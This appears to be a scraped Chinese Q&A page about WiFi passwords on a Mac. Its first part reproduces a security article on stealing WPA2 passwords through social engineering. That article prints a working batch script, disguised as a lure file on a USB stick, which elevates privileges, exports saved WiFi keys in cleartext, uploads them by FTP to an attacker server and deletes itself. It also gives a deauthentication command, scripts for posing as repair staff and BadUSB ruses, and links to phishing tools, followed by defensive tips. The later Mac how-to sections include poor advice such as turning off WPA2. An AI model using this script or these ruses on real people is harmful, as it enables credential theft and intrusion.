Mac连接wifi需要WPA2密码该怎么弄?
0×00前言
何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off nul 21 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0", "", "", "runas", 1 "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" exit /B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) md c:\win netsh wlan export profile key=clear folder=c:\win echo open 服务器ipC:\config.txt echo user 账号C:\config.txt echo 密码C:\config.txt echo mput c:\win\*.xmlC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo byeC:\config.txt ftp -n -s:"C:\config.txt" del C:\config.txt del C:\win\*.xml del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
wifi信息已经put上来了
就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用网络)对受害者使用断网攻击,等一小时后去敲门,询问网络是否故障,询问网络是哪家公司配置的,然后声称自己的网络也故障了,是一样的公司,然后询问报修电话并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复网络的假象,然后撤退。
2.结合移动存储攻击,配合badusb,谎称有重要文件需要发送然而手机没电了,家里人还没下班。第一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badusb,执行bat脚本或木马
3.谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码
0×03 wifi钓鱼
利用fluxion、wifiphisher等工具实施钓鱼攻击:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——项目地址
它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:
受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。
0×04 防御措施
1.绑定mac地址,设置白名单,只允许自己的机器连接wifi
2.隐藏wifi广播,避免自己成为目标
3.不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
4.尽量不让陌生人接触到自己的设备
5.wifi最好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
6.定期更换路由器管理界面密码和wifi密码
7.最好关闭路由器上的wps功能
8.尽量不使用wifi万能钥匙等类似软件
*本文作者:thr0cyte,转载请注明来自FreeBuf.COM
Mac怎么看wifi密码,苹果电脑怎么查看wifi密码
通过无线路由器设置查看密码
用无线路由器进行上网都会设置无线网络的密码,所以可以在无线路由设置里看到密码。具体的步骤方法:
打开浏览器,输入192.168.1.1,弹窗无线路由器的登录,正常账号都是admin,密码也是admin,这里输入的地址和账户密码会因为路由器的不同而有所不一样;
点击“登录”后,进入无线路由设置向导页面;
在左侧的菜单栏,选择“无线设置”下的“无线安全设置”,点击后,右侧会出现路由器的相关的加密方式,选择自己加密的形式,可以查看wifi密码。
苹果笔记本如何连接需要账号密码的无线网络
苹果Mac电脑上使用的内置AirPort卡连接到无线网络。如果你需要知道你要连接到哪个无线网络,可以通过网络名称(SSID),以及无线安全类型和密钥。至于SSID及无线密码可以从网络管理员那里获取,当然你本身也可以是网络管理员。获取方法:登陆无线路由器设置界面,在IE中输入192.168.1.1,按回车。进入WEB界面后,通过"无线设置“项可以获取当前SSID号、“无线网络安全”可以看到你设置的无线密钥信息。
1、点击桌面的左上角的“苹果”菜单,然后单击“系统偏好设置”和“网络”。
2、点击下拉菜单旁边的“网络名称”找到你要连接到无线网络,然后输入无线密码的提示。如果您的网络名称是不在名单上,继续执行步骤3。
3、点击“网络名称”旁边的下拉菜单中,点击“加入其他网络”
4、输入您尝试连接到无线网络的网络名称。
5、点击下拉菜单下的“安全”,然后单击您的无线网络使用的安全性类型。
6、输入到旁边的框“密码的无线网络安全的关键。”》
点击“加入”
苹果笔记本电脑查看无线网络密码的步骤
1、请打开
Mac
系统中的“实用工具”窗口,可以点击屏幕顶部菜单中“前往”,再点击“实用工具”选项。
2,、在实用工具窗口中点击打开“钥匙串访问”图标。
3、在钥匙串访问窗口中,由于一般在
Mac
电脑中保存的密码都比较多,我们可以直接在右下角搜索框中输入无线网络名称,然后在列表中找到无线网络。
4、找到想要查看密码的无线网络以后,双击打开。在新窗口中点击“显示密码”选项。
5、接着再输入我们的登录系统密码。
6、随后即可看到这个无线
Wifi
网络的接入密码了。
macbook pro mac系统 如何连接带有账号密码的无线网
苹果Mac电脑上使用的内置AirPort卡连接到无线网络。如果你需要知道你要连接到哪个无线网络,可以通过网络名称(SSID),以及无线安全类型和密钥。至于SSID及无线密码可以从网络管理员那里获取,当然你本身也可以是网络管理员。获取方法:登陆无线路由器设置界面,在IE中输入192.168.1.1,按回车。进入WEB界面后,通过"无线设置“项可以获取当前SSID号、“无线网络安全”可以看到你设置的无线密钥信息。
1、点击桌面的左上角的“苹果”菜单,然后单击“系统偏好设置”和“网络”。
2、点击下拉菜单旁边的“网络名称”找到你要连接到无线网络,然后输入无线密码的提示。如果您的网络名称是不在名单上,继续执行步骤3。
3、点击“网络名称”旁边的下拉菜单中,点击“加入其他网络”
4、输入您尝试连接到无线网络的网络名称。
5、点击下拉菜单下的“安全”,然后单击您的无线网络使用的安全性类型。
6、输入到旁边的框“密码的无线网络安全的关键。”》 点击“加入”
苹果电脑需要wpa2密码怎么解决
苹果电脑连接无线网需要wpa2密码是加密保护措施,解决办法就是取消wpa2保护。具体操作如下:
1.打开电脑上自带的浏览器,在地址栏输入192.168.0.1进入路由器管理页面。
2.在路由器管理页面中找到无线设置,然后点击无线设置下的无线安全设置。
3.在无线网络安全设置中选择不开启无线安全即可关闭wpa/wpa2保护,最后点击下方的保存即可。
WPA2(WPA第二版)是Wi-Fi联盟对采用IEEE802.11i安全增强功能的产品的认证计划。简单一点理解,WPA2是基于WPA的一种新的加密方式。
在苹果mac系统下如何查看这台苹果电脑所连接的无线网络的密码?
前提是要越狱过。下载【WIFI万能钥匙密码查看器】
查看WIFI密码:
1.破解完WIFI密码后,其实还不够完整。因为万能钥匙并没有提供可查看wifi密码的设置,所以此时要借助【wifi万能钥匙密码查看器】。
2.下载并启动【wifi万能钥匙密码查看器】。
3.刚刚破解的wifi密码就可以看得到。
苹果电脑怎么查看Wi-Fi密码啊?
方法如下:
1、打开“菜单栏”,找到“其他”里的“钥匙串访问”并打开
也可以使用快捷键“Control+Space空格键”,输入“钥匙”关键字里同样可以找到该功能
2、左侧“钥匙串”列表中选择“本地项目”,“种类”列表中选择“所有项目”
比如我现在已连接的 WIFI 名称为“HOME”,那就先从“名称”列表里找到“HOME(即当前已连接的 WIFI 名称)”
3、右键并选择“将密码拷贝到剪贴板”,系统会提示你输入本地用户的密码,输入后回车即可
4、此时密码已经被复制到剪贴板了,只需随便打开一个可以输入文本内容的文本框,比如 Safari 网页浏览器的地址栏、Pages 文本编辑器、QQ聊天窗口等。最后只要使用快捷键“Command+V”粘贴出来即可